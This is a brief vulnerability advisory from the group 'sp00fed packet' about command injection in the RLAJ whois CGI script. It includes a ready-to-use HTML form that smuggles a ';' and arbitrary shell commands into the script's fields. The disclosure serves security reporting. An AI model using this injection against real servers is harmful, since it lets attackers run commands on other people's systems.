/----------------+--------------------------------------+-------------\
| sp00fed packet |                                      | advisory #1 |
+----------------+--------------------------------------+-------------+
| Product: RLAJ on-line whois service                                 |
| Vulnerability: command execution                                    |
| Danger: high                                                        |
| Vendor: http://www.rlaj.com/                                        |
\---------------------------------------------------------------------/
    ::Description::
 This whois service doesn't filter special symbols, so you can enter
|<any *nix command>| into domain name field. But domain name can not
contain "." symbols. There is one more method. Just use this form:

<form method=post action="http://server/cgi-bin/whois/whois.cgi">
<input type=hidden name="lookup" value=";"> Cmd:
<input type="text" name="ext"><input type=submit value="Go">
</form>
 The script is popular (385 people have downloaded it at www.cgi.ru
(Russian public collection of scripts)), so the danger is high.

    ::Vendor::
 Vendor was informed 2 days ago. No response was received.

    ::Contacts::
 [http://www.sp00fed.ru/] sp00fed packet
 [zeux@inbox.ru] Zeux (it's me ;)
 [spikir@rbcmail.ru] Spikir (team coordinator)